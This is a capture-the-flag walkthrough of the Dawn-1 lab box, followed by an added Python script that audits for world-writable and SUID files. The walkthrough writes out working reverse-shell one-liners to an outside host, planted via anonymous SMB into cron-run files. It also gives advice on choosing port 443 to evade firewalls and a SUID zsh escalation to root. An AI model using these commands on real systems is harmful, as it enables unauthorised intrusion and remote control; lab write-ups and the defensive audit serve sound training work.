Hop onto Proving Grounds at: https://portal.offsec.com/labs/play
Login, connect via VPN.
Activate the Dawn-1 Box and you’ll have an IP address to start targeting.
– #nmap -sSV -T4 -p- --open [targetIP]
– 80, 139, 445, 3306 are open. Awesome. Seems like an SMB box today, with MySQL on 3306 as well.
– 139/445 are netbios-ssn: Samba smbd 3.x on 139 and Samba smbd 4.9.5-Debian on 445.
– $searchsploit both to find a potential vuln.
– smbclient
– Gobuster on TCP/80 for file and dir fuzzing.
– nmap -p 139,445 --script=smb-vuln-* [TargetIP] shows it vulnerable to a DoS, but that’s useless here.
– wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-words.txt --hc 404 http://[TargetIP]/FUZZ
– wfuzz -c -z file,/opt/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 http://[TargetIP]/FUZZ
– http://targetIP/.DS_STORE not found, nor robots.txt.
– wfuzz found http://targetIP/logs/management.log, where we see some files having their permissions changed to 777. Score!
– In the log file, we see Genimedes and Dawn as usernames. (shock)
– We can probably write to the 777 permission files. Maybe one is a cronjob or something to be executed.
– /home/dawn/ITDEPT/web-control is 777 perms.
– For now, nmap -p 139,445 --script=smb-enum-shares [TargetIP] shows print$, IPC$ and a share called \\targetIP\ITDEPT.
– Let’s go old school with $enum4linux [TargetIP] and we get in as anonymous with READ/WRITE access! Nice server, buddy.
– smbclient //targetIP/ITDEPT -N (null session): we connect, but the share is empty.
– The management.log file said there were two files in there, product-control and web-control, both with 777 perms, which means we can probably write our own content into them.
– It’s also the webroot lol. Here we go!
– echo "bash -c 'bash -i >& /dev/tcp/1.2.3.4/443 0>&1'" > product-control, then call it with a browser or shell. Both work.
– This will cause it to call back into our listener for a basic shell, then priv esc from there.
– nc -nvlp 443 (TCP/443 is probably allowed out their firewall AND it will blend in with normal traffic. Don’t use ports like 4444, because that would stick out and maybe be blocked anyhow.)
– We’ll also try a reverse shell in the other file in the web root we found in management.log: echo "nc 1.2.3.4 9090 -e /bin/bash" > web-control
– smbclient //targetIP/ITDEPT -N (null session), where we have the READ/WRITE access we found with enum4linux.
– We copy our two files, web-control and product-control with our reverse shells onto the smb share.
– A few seconds later, the reverse shell was executed and we got an unprivileged shell. Now privilege escalation.
– python3 -c 'import pty; pty.spawn("/bin/bash")' to upgrade our shell to bash.
– Background the shell with Ctrl+Z, then $stty raw -echo; fg; reset – worked great.
– $tty to view our shell as /dev/pts/0. Nobody else on the box.
– Simply run $find / -perm -4000 2> /dev/null to find zsh with the SUID bit set. You could also run linpeas.sh from GitHub or madlinux.com/linpeas.sh.
– Run $zsh and BOOM, root. cat /root/proof.txt
– Done.
PS I repeated this box earlier but it was different enough that I forgot I did the box already lol.
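Both footholds on this box come down to file-permission hygiene: scripts that were chmod 777 and then executed by something privileged, and a shell (zsh) left SUID. The following is an added example (not from the original post or from OffSec) of the audit a defender would run to catch exactly those two conditions before an attacker does. The inventory paths and modes are constructed to mirror the walkthrough; the SUID allowlist is an assumption that should be tuned to the host's own baseline.

```python
import os
import stat
from typing import Iterable, List, Tuple

# Constructed inventory modelled on the walkthrough: (path, st_mode).
# 0o100777 = regular file, rwxrwxrwx; 0o104755 = regular file with SUID set.
SAMPLE_INVENTORY: List[Tuple[str, int]] = [
    ("/home/dawn/ITDEPT/web-control", 0o100777),
    ("/home/dawn/ITDEPT/product-control", 0o100777),
    ("/home/dawn/ITDEPT/README", 0o100644),
    ("/usr/bin/zsh", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/etc/hosts", 0o100644),
]

# Assumption: SUID binaries expected on a Debian host. Anything else with the
# SUID bit (zsh, for instance) is a finding.
SUID_ALLOWLIST = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su",
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/newgrp",
}

ANY_EXEC = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH


def audit(inventory: Iterable[Tuple[str, int]]) -> List[Tuple[str, str]]:
    """Return (path, finding) pairs for regular files that are world-writable
    or carry an unexpected SUID bit. Executable world-writable files are
    reported separately because they are the ones a scheduler or service
    might run."""
    findings: List[Tuple[str, str]] = []
    for path, mode in inventory:
        if not stat.S_ISREG(mode):
            continue  # directories, links and devices need different checks
        if mode & stat.S_IWOTH:
            kind = "world-writable-executable" if mode & ANY_EXEC else "world-writable"
            findings.append((path, kind))
        if mode & stat.S_ISUID and path not in SUID_ALLOWLIST:
            findings.append((path, "unexpected-suid"))
    return findings


def scan_tree(root: str) -> List[Tuple[str, int]]:
    """Build an inventory from a live filesystem with lstat (no symlink
    following), so the same audit() can run on a real host."""
    inventory: List[Tuple[str, int]] = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                inventory.append((full, os.lstat(full).st_mode))
            except OSError:
                continue  # unreadable or vanished; skip rather than abort
    return inventory


if __name__ == "__main__":
    for path, kind in audit(SAMPLE_INVENTORY):
        print(f"{kind:28s} {path}")
```

Run against the constructed inventory it flags web-control and product-control as world-writable executables and zsh as an unexpected SUID binary, while passwd (allowlisted) and the 644 files are silent. On a live host, `audit(scan_tree("/"))` gives the same report; pairing it with a cron or systemd timer and diffing successive runs turns a one-off check into the kind of alert that would have caught the chmod 777 recorded in management.log.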